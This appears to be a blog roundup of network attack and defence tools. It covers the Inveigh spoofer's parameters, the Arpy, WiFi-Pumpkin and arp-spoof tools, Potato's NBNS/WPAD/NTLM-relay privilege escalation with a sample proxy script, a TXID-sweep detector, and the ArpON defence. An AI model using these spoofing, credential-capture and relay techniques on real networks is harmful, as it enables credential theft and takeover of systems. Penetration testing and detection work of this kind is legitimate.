Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay.
DESCRIPTION:
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers who find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client-imposed restrictions.

Module version of Inveigh

~ Parameter ~
.PARAMETER IP
Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the ‘SpooferIP’ parameter is not set.
.PARAMETER SpooferIP
Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to another system.
.PARAMETER HTTP
Default = Enabled: Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPS
Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
If the script does not exit gracefully, execute “netsh http delete sslcert ipport=0.0.0.0:443” and manually remove the certificate from “Local Computer\Personal” in the cert store.
.PARAMETER SMB
Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system’s SMB server.
.PARAMETER LLMNR
Default = Enabled: Enable/Disable LLMNR spoofing.
.PARAMETER NBNS
Default = Disabled: Enable/Disable NBNS spoofing.
.PARAMETER NBNSTypes
Default = 20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
.PARAMETER Challenge
Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
.PARAMETER SMBRelay
Default = Disabled: Enable/Disable SMB relay.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
.PARAMETER SMBRelayCommand
Command to execute on SMB relay target.
.PARAMETER SMBRelayUsernames
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts either just the username or domain\username format.
.PARAMETER SMBRelayAutoDisable
Default = Enable: Automatically disable SMB relay after a successful command execution on target.
.PARAMETER SMBRelayNetworkTimeout
Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
.PARAMETER Repeat
Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
.PARAMETER ForceWPADAuth
Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
.PARAMETER ConsolePrompt
Default = Enabled: Enable/Disable the console prompt.
.PARAMETER RunTime
Set the run time duration in minutes. Note that leaving the Inveigh console open will prevent Inveigh from exiting once the set run time is reached.
.PARAMETER ConsoleOutput
Default = Console Output Disabled: Enable/Disable realtime console output.
.PARAMETER FileOutput
Default = File Output Disabled: Enable/Disable realtime file output.
.PARAMETER OutputDir
Default = Working Directory: Set an output directory for log and capture files.
.PARAMETER ShowHelp
Default = Enabled: Enable/Disable the help messages at startup.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Notes:
– Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
– LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
– SMB challenge/response captures are performed by sniffing over the host system’s SMB service.
– HTTP challenge/response captures are performed with a dedicated listener.
– The local LLMNR/NBNS services do not need to be disabled on the host system.
– LLMNR/NBNS spoofer will point victims to host system’s SMB service, keep account lockout scenarios in mind.
– Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
– Ensure that the LLMNR, NBNS, SMB and HTTP ports are open within any local firewall on the host system.
– Output files will be created in current working directory.
– If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
– Code is proof of concept level and may not work under some scenarios.

Usage :
Obtain an elevated administrator or SYSTEM shell. If necessary, execute Set-ExecutionPolicy Unrestricted within PowerShell.
To execute with default settings:

Inveigh.ps1 -i localip

To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -SMB Y/N

Download: Master.zip  | Clone Url | Our Post Before
Source : https://github.com/Kevin-Robertson


Arpy v3.15 – ARP MiTM Tool.


Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions:
+ Packet Sniffing
+ Visited Domains
+ Visited Domains with Gource

arpy v3.15

Tested OS (to date):
+ Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)
+ Kali 2.0, Fedora & Ubuntu LTS 14.04

Requirements:
– Python 2.7
– Gource
– Scapy

usage :

git clone https://github.com/ivanvza/arpy
cd arpy
sudo apt-get install gource   # Kali, Debian & Ubuntu
yum install gource            # Fedora
pip install scapy

./arpy.py

source : https://github.com/ivanvza

WiFi-Pumpkin v0.71 released – Framework for Rogue Wi-Fi Access Point Attack.


Changelog v0.71:
+ added update commits from repository
+ added QTableWidget filter (mac,ip,hostname) clients connected on AP.
+ added count of clients connected on AP.
+ changed name Tool Wifi-Pumpkin
+ locked dnsmasq support temporarily


WiFi-Pumpkin is a security tool that provides a rogue access point for man-in-the-middle and network attacks. The access point purports to provide wireless Internet service while snooping on the traffic, and can be used to capture the credentials of unsuspecting users either by snooping on the communication or by phishing.
Features
+ Rogue Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Credentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mdk3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Poison
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install

then
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs

arp-spoof ~ ARP-Spoofing tool written in Rust language.


This tool allows intercepting IPv4 traffic between two hosts on the same network, typically between one machine and the internet gateway.

Features:
+ 1 to 1 route poisoning
+ save intercepted traffic as pcap file
+ automatic IPv4 forwarding
Rust Crate Dependencies:
– pcap
– argparse
– nix
– time

TODO:
– implement n to m route poisoning
– remove --own parameter as soon as rust-pcap allows ip enumeration.

Usage:

git clone https://github.com/gcarq/arp-spoof && cd arp-spoof
cargo build
cd target/debug
./arp-spoof -h   # print help

Note for arch Linux:
On Arch based Linux, install community/rust, community/cargo and core/libpcap. If not running as root, you need to set capabilities like so: sudo setcap cap_net_raw,cap_net_admin=eip path/to/bin

Source : https://github.com/gcarq

Potato – Windows privilege escalation through NTLM Relay and NBNS Spoofing.


How it works?
Potato takes advantage of known issues in Windows to gain local privilege escalation, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using the techniques outlined below, it is possible for an unprivileged user to gain “NT AUTHORITY\SYSTEM” level access to a Windows host in default configurations.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches:

Potato – Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012

1. Local NBNS Spoofer
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. For privilege escalation purposes, we can’t assume that we are able to sniff network traffic, so how can we accomplish NBNS spoofing?
If we can know ahead of time which host a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a response and flood the target host with NBNS responses (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response. We can overcome this by flooding quickly and iterating over all 65536 possible values.
In testing, this has proved to be 100% effective.

2. Fake WPAD Proxy Server
With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for “http://wpad/wpad.dat”, it responds with something like the following:

function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "localhost")) return "DIRECT";
    return "PROXY 127.0.0.1:80";
}

This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.
Interestingly, this attack when performed by even a low privilege user will affect all users of the machine. This includes administrators, and system accounts. See the screenshots “egoldstein_spoofing.png” and “dade_spoofed.png” for an example.

3. HTTP -> SMB NTLM Relay
With all HTTP traffic now flowing through a server that we control, we can do things like request NTLM authentication…
In the Potato exploit, all requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
The NTLM credentials are relayed to the local SMB listener to create a new system service that runs a user-defined command. This command will run with “NT AUTHORITY\SYSTEM” privilege.

Mitigations:
Enabling “Extended Protection for Authentication” in Windows should stop NTLM relay attacks.
SMB Signing may also mitigate this type of attack, however this would require some more research on my part to confirm.

Off Broadcast NBNS Spoofing
Using the same NBNS spoofing technique as the Potato exploit, we can perform NBNS spoofing against any host for which we can talk to UDP 137. We simply need to send UDP packets quickly enough to sneak in a valid reply before the NBNS request times out.
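
Detection logic for the TXID sweep described above, as an added example that is not part of Potato or of the original post. It decodes an NBNS payload and flags a source that sends unsolicited responses for one name under many different TXIDs; the event tuple layout, the thresholds and all function names are assumptions made for this illustration, and the sample data is constructed.

```python
import struct
from collections import defaultdict, deque

# Constructed sample: positive name query response, "WPAD" -> 127.0.0.1
SAMPLE_RESPONSE = (
    bytes.fromhex("1a2b85000000000100000000")               # TXID, flags, counts
    + b"\x20" + b"FHFAEBEE" + b"CA" * 11 + b"AA" + b"\x00"  # first-level encoded name
    + bytes.fromhex("002000010000012c000600007f000001")     # NB, IN, TTL, rdata
)

def parse_nbns(payload):
    """Return (txid, is_response, name, suffix) for a UDP/137 payload, or None."""
    if len(payload) < 46 or payload[12] != 0x20:
        return None
    txid, flags = struct.unpack(">HH", payload[:4])
    enc = payload[13:45]
    if any(not 0x41 <= b <= 0x50 for b in enc):   # only 'A'..'P' are legal
        return None
    # Each name byte is stored as two nibbles, each added to 'A'
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    name = raw[:15].decode("ascii", "replace").rstrip()
    return txid, bool(flags & 0x8000), name, raw[15]

def detect_txid_sweeps(events, window=2.0, min_txids=32):
    """events: time-ordered (ts, src, dst, txid, is_response, name) tuples.
    Returns {(src, dst, name): distinct_txids} for sources whose unsolicited
    responses cover at least min_txids TXIDs within `window` seconds."""
    outstanding = set()           # (querier, txid, name) taken from queries
    recent = defaultdict(deque)   # (src, dst, name) -> (ts, txid) of unsolicited replies
    alerts = {}
    for ts, src, dst, txid, is_response, name in events:
        if not is_response:
            outstanding.add((src, txid, name))
            continue
        if (dst, txid, name) in outstanding:
            outstanding.discard((dst, txid, name))
            continue              # answers a query the destination really sent
        key = (src, dst, name)
        q = recent[key]
        q.append((ts, txid))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = len({t for _, t in q})
        if distinct >= min_txids:
            alerts[key] = max(distinct, alerts.get(key, 0))
    return alerts

# Constructed events: one normal lookup, then a 200-TXID sweep on loopback
BENIGN = [
    (0.00, "10.0.0.5", "10.0.0.255", 0x1A2B, False, "FILESRV"),
    (0.01, "10.0.0.9", "10.0.0.5", 0x1A2B, True, "FILESRV"),
]
SWEEP = [(5.0 + i * 0.001, "127.0.0.1", "127.0.0.1", i, True, "WPAD")
         for i in range(200)]

if __name__ == "__main__":
    print(parse_nbns(SAMPLE_RESPONSE))
    print(detect_txid_sweeps(BENIGN + SWEEP))
```

A legitimate responder sends one reply carrying the TXID of the query it saw, so the number of distinct TXIDs per source, destination and name is the signal; on the host itself the same logic applies to loopback traffic on UDP 137.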

Download : potato-master.zip
Source : https://github.com/breenmachine

ArpON “ARP handler inspection” v3.0-ng released.


IMPORTANT NOTICE:
Since ArpON 3.0-ng (next generation), ArpON has been rewritten from scratch, therefore all the old versions of ArpON (lower than 3.0-ng) are deprecated. Please upgrade all installations of ArpON and carefully read the documentation and the man page of ArpON.

ArpON -ARP handler inspection-3.0-ng

ArpON (ARP handler inspection) is a host-based solution that makes the ARP standardized protocol secure in order to avoid Man In The Middle (MITM) attacks through ARP spoofing, ARP cache poisoning or ARP poison routing.
This is possible using three kinds of anti ARP spoofing techniques:
+ SARPI (Static ARP Inspection) for the statically configured networks without DHCP;
+ DARPI (Dynamic ARP Inspection) for the dynamically configured networks with DHCP;
+ HARPI (Hybrid ARP Inspection) for the statically and dynamically configured networks with DHCP.
The goal of ArpON is therefore to provide a secure and efficient network daemon that provides the SARPI, DARPI and HARPI anti ARP spoofing technique, thus making the ARP standardized protocol secure from any foreign intrusion.


The features of ArpON are:
+ Free. ArpON is released under the BSD open source license. This means that you have total freedom to modify and use it with your system, even if it’s commercial.
+ Popular. ArpON is used as the network daemon by many users, both network managers and academic researchers. ArpON is downloaded several hundred times every month.
+ Tested and reliable. Many users have contributed over the years in testing ArpON on a wide range of Man In The Middle (MITM) attack tools through the ARP spoofing, ARP cache poisoning or ARP poison routing.
+ Easy to use. ArpON is distributed as a single tarball that once compiled, runs on every supported Operating System. You launch the executable, and from that moment the Operating System is able to avoid the Man In The Middle (MITM) attack through the ARP spoofing, ARP cache poisoning or ARP poison routing.
+ Multi-platform. Many developers have contributed over the years in porting ArpON on a wide range of GNU/Linux distributions.
+ Compatible and portable. ArpON is completely compatible with the ARP standardized protocol. ArpON is a network daemon that runs in user space, which also means that ArpON will be easily portable to other Operating Systems.
+ Well documented. The documentation of ArpON is easy and complete. The documentation contains the retrieving tutorial; the building tutorial; the installation tutorial; the user tutorial with many examples and scenarios; the development tutorial with the Activity diagrams of the SARPI, DARPI and HARPI anti ARP spoofing technique and with modular source code well commented; the bug report tutorial that takes you step-by-step through all of the features of ArpON.

Installation:

sudo apt-get install libnet1-dev
sudo apt-get install pthread
# for more dependencies read http://arpon.sourceforge.net/documentation.html#11
wget http://sourceforge.net/projects/arpon/files/latest/download -O arpon.tar.gz
wget http://sourceforge.net/projects/arpon/files/latest.md5/download -O latest.md5
md5sum arpon.tar.gz | awk '{print $1}' > arpon.md5
# the digest in arpon.md5 must match latest.md5 before unpacking; both files
# arrive over plain HTTP, so a match only rules out a corrupted download
mkdir arpon
tar -xvzf arpon.tar.gz -C arpon --strip-components=1
cd arpon

mkdir build
cd build
cmake ..
make
sudo make install

Source : http://arpon.sourceforge.net